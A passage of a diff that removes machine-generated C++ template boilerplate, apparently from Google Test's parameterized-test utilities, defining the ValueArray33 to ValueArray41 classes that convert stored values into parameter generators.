-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33>
-class ValueArray33 {
- public:
-  ValueArray33(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32,
-      T33 v33) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26),
-      v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32),
-      v33_(v33) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray33& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34>
-class ValueArray34 {
- public:
-  ValueArray34(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26),
-      v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32),
-      v33_(v33), v34_(v34) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray34& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35>
-class ValueArray35 {
- public:
-  ValueArray35(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6),
-      v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13),
-      v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19),
-      v20_(v20), v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25),
-      v26_(v26), v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31),
-      v32_(v32), v33_(v33), v34_(v34), v35_(v35) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray35& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36>
-class ValueArray36 {
- public:
-  ValueArray36(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5),
-      v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12),
-      v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18),
-      v19_(v19), v20_(v20), v21_(v21), v22_(v22), v23_(v23), v24_(v24),
-      v25_(v25), v26_(v26), v27_(v27), v28_(v28), v29_(v29), v30_(v30),
-      v31_(v31), v32_(v32), v33_(v33), v34_(v34), v35_(v35), v36_(v36) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray36& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37>
-class ValueArray37 {
- public:
-  ValueArray37(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37) : v1_(v1), v2_(v2), v3_(v3), v4_(v4),
-      v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11),
-      v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17),
-      v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22), v23_(v23),
-      v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28), v29_(v29),
-      v30_(v30), v31_(v31), v32_(v32), v33_(v33), v34_(v34), v35_(v35),
-      v36_(v36), v37_(v37) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray37& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38>
-class ValueArray38 {
- public:
-  ValueArray38(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38) : v1_(v1), v2_(v2), v3_(v3),
-      v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22),
-      v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28),
-      v29_(v29), v30_(v30), v31_(v31), v32_(v32), v33_(v33), v34_(v34),
-      v35_(v35), v36_(v36), v37_(v37), v38_(v38) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray38& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39>
-class ValueArray39 {
- public:
-  ValueArray39(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39) : v1_(v1), v2_(v2),
-      v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22),
-      v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28),
-      v29_(v29), v30_(v30), v31_(v31), v32_(v32), v33_(v33), v34_(v34),
-      v35_(v35), v36_(v36), v37_(v37), v38_(v38), v39_(v39) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray39& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40>
-class ValueArray40 {
- public:
-  ValueArray40(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40) : v1_(v1),
-      v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9),
-      v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15),
-      v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21),
-      v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27),
-      v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32), v33_(v33),
-      v34_(v34), v35_(v35), v36_(v36), v37_(v37), v38_(v38), v39_(v39),
-      v40_(v40) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray40& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41>
-class ValueArray41 {
- public:
-  ValueArray41(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40,
-      T41 v41) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26),
-      v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32),
-      v33_(v33), v34_(v34), v35_(v35), v36_(v36), v37_(v37), v38_(v38),
-      v39_(v39), v40_(v40), v41_(v41) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
